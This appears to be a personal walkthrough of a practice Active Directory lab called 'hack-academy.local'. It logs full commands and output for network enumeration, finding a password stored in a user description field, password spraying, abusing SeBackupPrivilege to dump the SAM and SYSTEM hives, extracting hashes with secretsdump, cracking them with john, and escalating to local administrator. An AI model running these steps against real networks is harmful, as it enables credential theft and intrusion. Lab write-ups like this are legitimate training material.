// notes/ Practice Boxes
🏛️

AD Chain 01 — Blueprint AD-Chains

nxc smb 10.0.2.0/24

#blueprint ad-chains#adchain#walkthrough#boxes#os:windows#os:linux#tech:active-directory#tech:password-attack

AD Chain 01 — Blueprint AD-Chains

🐺 howlsec@kali
$nxc smb 10.0.2.0/24
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
🐺 howlsec@kali
$Credentials: Initial credentials for AD Chain 1 lab: lbennett : !!reiD123

Port Enumeration Client 1 - 10.0.2.7

🐺 howlsec@kali
$sudo rustscan -a 10.0.2.7 -- -A -sC
$
$PORT STATE SERVICE REASON VERSION
$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
$445/tcp open microsoft-ds? syn-ack ttl 128
$3389/tcp open ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
$|_ssl-date: 2026-02-11T00:57:02+00:00; +2s from scanner time.
$| ssl-cert: Subject: commonName=Client-1.hack-academy.local
$| Issuer: commonName=Client-1.hack-academy.local
$| Public Key type: rsa
$| Public Key bits: 2048
$| Signature Algorithm: sha256WithRSAEncryption
$| Not valid before: 2026-02-10T03:16:18
$| Not valid after: 2026-08-12T03:16:18
$| MD5: 78ae:4ed7:3306:afef:cc38:6a51:4f99:0a15
$| SHA-1: 0baf:8ccc:38a0:8371:b911:3a1f:b7bb:2598:52b2:a2b3
$| rdp-ntlm-info:
$| Target_Name: HACK-ACADEMY
$| NetBIOS_Domain_Name: HACK-ACADEMY
$| NetBIOS_Computer_Name: CLIENT-1
$| DNS_Domain_Name: hack-academy.local
$| DNS_Computer_Name: Client-1.hack-academy.local
$| DNS_Tree_Name: hack-academy.local
$| Product_Version: 10.0.19041
$|_ System_Time: 2026-02-11T00:56:22+00:00
$5040/tcp open unknown syn-ack ttl 128
$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-server-header: Microsoft-HTTPAPI/2.0
$|_http-title: Not Found
$49671/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$Host script results:
$| smb2-time:
$| date: 2026-02-11T00:56:22
$|_ start_date: N/A
$| nbstat: NetBIOS name: CLIENT-1, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:80:1d:57 (Oracle VirtualBox virtual NIC)
$| Names:
$| CLIENT-1<00> Flags: <unique><active>
$| HACK-ACADEMY<00> Flags: <group><active>
$| CLIENT-1<20> Flags: <unique><active>
$| Statistics:
$| 08:00:27:80:1d:57:00:00:00:00:00:00:00:00:00:00:00
$| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
$|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
$|_clock-skew: mean: 1s, deviation: 0s, median: 1s
$| smb2-security-mode:
$| 3:1:1:
$|_ Message signing enabled but not required
$| p2p-conficker:
$| Checking for Conficker.C or higher...
$| Check 1 (port 54967/tcp): CLEAN (Timeout)
$| Check 2 (port 10855/tcp): CLEAN (Timeout)
$| Check 3 (port 49010/udp): CLEAN (Timeout)
$| Check 4 (port 9711/udp): CLEAN (Timeout)
$|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
$
$49671/tcp open msrpc Microsoft Windows RPC

Port Enumeration Client 2 — 10.0.2.9

🐺 howlsec@kali
$sudo rustscan -a 10.0.2.9 -- -A -sC
$
$PORT STATE SERVICE REASON VERSION
$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
$445/tcp open microsoft-ds? syn-ack ttl 128
$3389/tcp open ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
$|_ssl-date: 2026-02-11T01:06:23+00:00; +2s from scanner time.
$| rdp-ntlm-info:
$| Target_Name: HACK-ACADEMY
$| NetBIOS_Domain_Name: HACK-ACADEMY
$| NetBIOS_Computer_Name: CLIENT-2
$| DNS_Domain_Name: hack-academy.local
$| DNS_Computer_Name: Client-2.hack-academy.local
$| DNS_Tree_Name: hack-academy.local
$| Product_Version: 10.0.19041
$|_ System_Time: 2026-02-11T01:05:43+00:00
$| ssl-cert: Subject: commonName=Client-2.hack-academy.local
$| Issuer: commonName=Client-2.hack-academy.local
$| Public Key type: rsa
$| Public Key bits: 2048
$| Signature Algorithm: sha256WithRSAEncryption
$| Not valid before: 2026-02-10T03:16:17
$| Not valid after: 2026-08-12T03:16:17
$| MD5: 37c5:b36f:0481:662d:8982:d0b7:edfc:cf3b
$| SHA-1: e36f:a0a5:8ca6:9a7f:5ff8:ca66:a8a5:81de:aaed:80fd
$5040/tcp open unknown syn-ack ttl 128
$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-server-header: Microsoft-HTTPAPI/2.0
$|_http-title: Not Found
$49671/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

Port Enumeration DC — 10.0.2.4

🐺 howlsec@kali
$sudo rustscan -a 10.0.2.4 -- -A -sC
$
$PORT STATE SERVICE REASON VERSION
$53/tcp open domain syn-ack ttl 128 Simple DNS Plus
$88/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-02-11 03:43:53Z)
$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
$389/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)
$445/tcp open microsoft-ds? syn-ack ttl 128
$464/tcp open kpasswd5? syn-ack ttl 128
$593/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
$636/tcp open tcpwrapped syn-ack ttl 128
$3268/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)
$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-title: Not Found
$|_http-server-header: Microsoft-HTTPAPI/2.0
$9389/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing
$49634/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
$49664/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$49667/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$49668/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$53452/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
$53460/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

Evilwinrm and RDP into Clinent 1 would not work

🐺 howlsec@kali
$evil-winrm -i 10.0.2.4 -u 'lbennett' -p '!!reiD123'
$xfreerdp3 /v:10.0.2.4 /u:'lbennett' /p:'!!reiD123' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboard

BloodHound

🐺 howlsec@kali
$#Get Bloodhound Data
$netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --bloodhound --collection All --dns-server 10.0.2.4
$#Get all users
$netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --users
$Administrator
$Guest
$krbtgt
$mjohnson
$lbennett
$egreen
$spatel
$dreyes
$nflores
$clee
$otran
$zmiller
$mross
$twest
$eknight
$mthompson
$#Its also very important to run it with --users only as set of credentials can be in the description
$(kali㉿kali)-[~/AD-chain1]
$└─$ netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --users
$LDAP 10.0.2.4 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack-academy.local)
$LDAP 10.0.2.4 389 DC01 [+] hack-academy.local\lbennett:!!reiD123
$LDAP 10.0.2.4 389 DC01 [*] Enumerated 16 domain users: hack-academy.local
$LDAP 10.0.2.4 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
$LDAP 10.0.2.4 389 DC01 Administrator 2025-11-29 14:30:04 0 Built-in account for administering the computer/domain
$LDAP 10.0.2.4 389 DC01 Guest <never> 1 Built-in account for guest access to the computer/domain
$LDAP 10.0.2.4 389 DC01 krbtgt 2025-08-24 13:08:23 12 Key Distribution Center Service Account
$LDAP 10.0.2.4 389 DC01 mjohnson 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 lbennett 2025-11-24 01:40:43 1
$LDAP 10.0.2.4 389 DC01 egreen 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 spatel 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 dreyes 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 nflores 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 clee 2025-11-24 01:40:43 12
$LDAP 10.0.2.4 389 DC01 otran 2025-11-24 01:40:44 12
$LDAP 10.0.2.4 389 DC01 zmiller 2025-11-24 01:40:44 12
$LDAP 10.0.2.4 389 DC01 mross 2025-11-24 01:40:44 12
$LDAP 10.0.2.4 389 DC01 twest 2025-11-29 15:16:20 0 HappyCactus$10
$LDAP 10.0.2.4 389 DC01 eknight 2025-11-24 01:40:44 0
$LDAP 10.0.2.4 389 DC01 mthompson 2025-11-29 14:53:23 3

Spray with new credentials across the network and across all different protocols— First SMB

🐺 howlsec@kali
$(kali㉿kali)-[~/AD-chain1]
$netexec smb ips -u users -p passwords --continue-on-success
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10

Spray with new credentials across the network and across all different protocols— Then Winrm

🐺 howlsec@kali
$kali㉿kali)-[~/AD-chain1]
$└─$ netexec winrm ips -u users -p passwords --continue-on-success
$WINRM 10.0.2.7 5985 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)
$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
$ arc4 = algorithms.ARC4(self._key)

Spray with new credentials across the network and across all different protocols— Then RDP

🐺 howlsec@kali
$(kali㉿kali)-[~/AD-chain1]
$└─$ netexec rdp ips -u users -p passwords --continue-on-success
$RDP 10.0.2.7 3389 CLIENT-1 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-1) (domain:hack-academy.local) (nla:True)
$RDP 10.0.2.9 3389 CLIENT-2 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-2) (domain:hack-academy.local) (nla:True)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Administrator:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Guest:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\krbtgt:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mjohnson:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\egreen:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\spatel:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\dreyes:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\nflores:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\clee:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\otran:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\zmiller:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mross:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\twest:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\eknight:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mthompson:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Administrator:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Guest:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\krbtgt:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mjohnson:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\lbennett:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\egreen:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\spatel:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\dreyes:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\nflores:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\clee:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\otran:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\zmiller:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mross:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\eknight:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mthompson:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Administrator:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Guest:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\krbtgt:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mjohnson:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\egreen:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\spatel:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\dreyes:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\nflores:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\clee:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\otran:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\zmiller:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mross:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\twest:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\eknight:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mthompson:!!reiD123 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Administrator:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Guest:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\krbtgt:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mjohnson:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\lbennett:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\egreen:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\spatel:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\dreyes:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\nflores:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\clee:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\otran:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\zmiller:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mross:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\eknight:HappyCactus$10 (STATUS_LOGON_FAILURE)
$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mthompson:HappyCactus$10 (STATUS_LOGON_FAILURE)
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Found credentials in Descriptio n and it works on Client1 twest:HappyCactus$10 winrm

🐺 howlsec@kali
$#Check Bloodhound Data with those owned Users

(screenshot omitted) (screenshot omitted) (screenshot omitted) (screenshot omitted) Nothing useful in Bloodhound so lets winrm into Client1

🐺 howlsec@kali
$evil-winrm -i 10.0.2.7 -u 'twest' -p 'HappyCactus$10'
$
$Evil-WinRM shell v3.7
$
$Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
$
$Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
$
$Info: Establishing connection to remote endpoint
$*Evil-WinRM* PS C:\Users\twest\Documents>
$#Check for the Folders and permissions
$*Evil-WinRM* PS C:\Users\twest> tree /a /f
$Folder PATH listing
$Volume serial number is DAB7-CF4A
$C:.
$+---Desktop
$+---Documents
$+---Downloads
$+---Favorites
$+---Links
$+---Music
$+---Pictures
$+---Saved Games
$\---Videos
$*Evil-WinRM* PS C:\Users\twest> whoami /all
$
$USER INFORMATION
$----------------
$
$User Name SID
$================== ==============================================
$hack-academy\twest S-1-5-21-1516340173-3939677173-1136271741-1135
$
$GROUP INFORMATION
$-----------------
$
$Group Name Type SID Attributes
$==================================== ================ ============ ==================================================
$Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
$Mandatory Label\High Mandatory Level Label S-1-16-12288
$
$PRIVILEGES INFORMATION
$----------------------
$
$Privilege Name Description State
$============================= ==================================== =======
$SeBackupPrivilege Back up files and directories Enabled
$SeRestorePrivilege Restore files and directories Enabled
$SeShutdownPrivilege Shut down the system Enabled
$SeChangeNotifyPrivilege Bypass traverse checking Enabled
$SeUndockPrivilege Remove computer from docking station Enabled
$SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
$SeTimeZonePrivilege Change the time zone Enabled
$
$USER CLAIMS INFORMATION
$-----------------------
$
$User claims unknown.
$
$Kerberos support for Dynamic Access Control on this device has been disabled.
$*Evil-WinRM* PS C:\Users\twest>

Privesc with abuse of SeBackupPrivilege

🐺 howlsec@kali
$*Evil-WinRM* PS C:\Users\twest> cd c:\
$*Evil-WinRM* PS C:> mkdir temp
$
$ Directory: C:\
$
$Mode LastWriteTime Length Name
$---- ------------- ------ ----
$d----- 2/11/2026 8:08 PM temp
$
$*Evil-WinRM* PS C:> cd temp
$*Evil-WinRM* PS C:\temp> reg save hklm\sam c:\Temp\sam
$The operation completed successfully.
$
$*Evil-WinRM* PS C:\temp> dir
$
$ Directory: C:\temp
$
$Mode LastWriteTime Length Name
$---- ------------- ------ ----
$-a---- 2/11/2026 8:08 PM 49152 sam
$
$*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
$The operation completed successfully.
$
$*Evil-WinRM* PS C:\temp> download sam
$
$Info: Downloading C:\temp\sam to sam
$
$Info: Download successful!
$*Evil-WinRM* PS C:\temp> download system

And now we can dump hashes with secretsdump and we get the hashes

🐺 howlsec@kali
$└─$ impacket-secretsdump -system system -sam sam local
$Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
$
$[*] Target system bootKey: 0xbacf965a2426afda3d2207e4d6aa3904
$[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
$Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:156e3de3d13ba510e8c2b62f4f5d0216:::
$Matt:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
$[*] Cleaning up...

Crack it with john and format=nt — We get password for Matt : Password1!

🐺 howlsec@kali
$john --wordlist=/usr/share/wordlists/rockyou.txt hashes_local_client1 --format=nt
$Using default input encoding: UTF-8
$Loaded 3 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
$Warning: no OpenMP support for this hash type, consider --fork=8
$Press 'q' or Ctrl-C to abort, almost any other key for status
$ (Administrator)
$Password1! (Matt)
$2g 0:00:00:00 DONE (2026-02-12 00:19) 2.222g/s 15937Kp/s 15937Kc/s 16137KC/s markinho..*7¡Vamos!
$Warning: passwords printed above might not be all those cracked
$Use the "--show --format=NT" options to display all of the cracked passwords reliably

Since Matt is not domain user, you can just spraying but with —local-auth

🐺 howlsec@kali
$netexec winrm ips -u Matt -p 'Password1!' --local-auth
🐺 howlsec@kali
$─(kali㉿kali)-[~/AD-chain1]
$└─$ netexec winrm ips -u Matt -p 'Password1!' --local-auth
$WINRM 10.0.2.7 5985 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 (name:CLIENT-1) (domain:hack-academy.local)
$WINRM 10.0.2.4 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack-academy.local)
$WINRM 10.0.2.9 5985 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 (name:CLIENT-2) (domain:hack-academy.local)
$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
$ arc4 = algorithms.ARC4(self._key)
$WINRM 10.0.2.7 5985 CLIENT-1 [-] CLIENT-1\Matt:Password1!
$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
$ arc4 = algorithms.ARC4(self._key)
$WINRM 10.0.2.4 5985 DC01 [-] DC01\Matt:Password1!
$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
$ arc4 = algorithms.ARC4(self._key)
$WINRM 10.0.2.9 5985 CLIENT-2 [-] CLIENT-2\Matt:Password1!
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
$
$┌──(kali㉿kali)-[~/AD-chain1]
$└─$ netexec smb ips -u Matt -p 'Password1!' --local-auth
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [-] DC01\Matt:Password1! STATUS_LOGON_FAILURE
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:CLIENT-2) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [-] CLIENT-2\Matt:Password1! STATUS_LOGON_FAILURE
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:CLIENT-1) (signing:False) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [+] CLIENT-1\Matt:Password1!
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
$
$┌──(kali㉿kali)-[~/AD-chain1]
$└─$ netexec rdp ips -u Matt -p 'Password1!' --local-auth
$RDP 10.0.2.9 3389 CLIENT-2 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-2) (domain:CLIENT-2) (nla:True)
$RDP 10.0.2.9 3389 CLIENT-2 [-] CLIENT-2\Matt:Password1! (STATUS_LOGON_FAILURE)
$RDP 10.0.2.7 3389 CLIENT-1 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-1) (domain:CLIENT-1) (nla:True)
$RDP 10.0.2.7 3389 CLIENT-1 [+] CLIENT-1\Matt:Password1! (Pwn3d!)
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Matt can RDP into Client1

🐺 howlsec@kali
$xfreerdp3 /v:10.0.2.7 /u:'Matt' /p:'Password1!' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboard
$#Since Matt is part of the Administrators Group, you can add twest into the same group as well and then dump
$net localgroup "administrators" twest /add

(screenshot omitted) Now you can Remotely dump all the Hashes —> You want to dump (sam, lsassy, nanodump,lsa and lsa secdump) hashes. Lsasy dumps mscash2 which is important for pivoting!

🐺 howlsec@kali
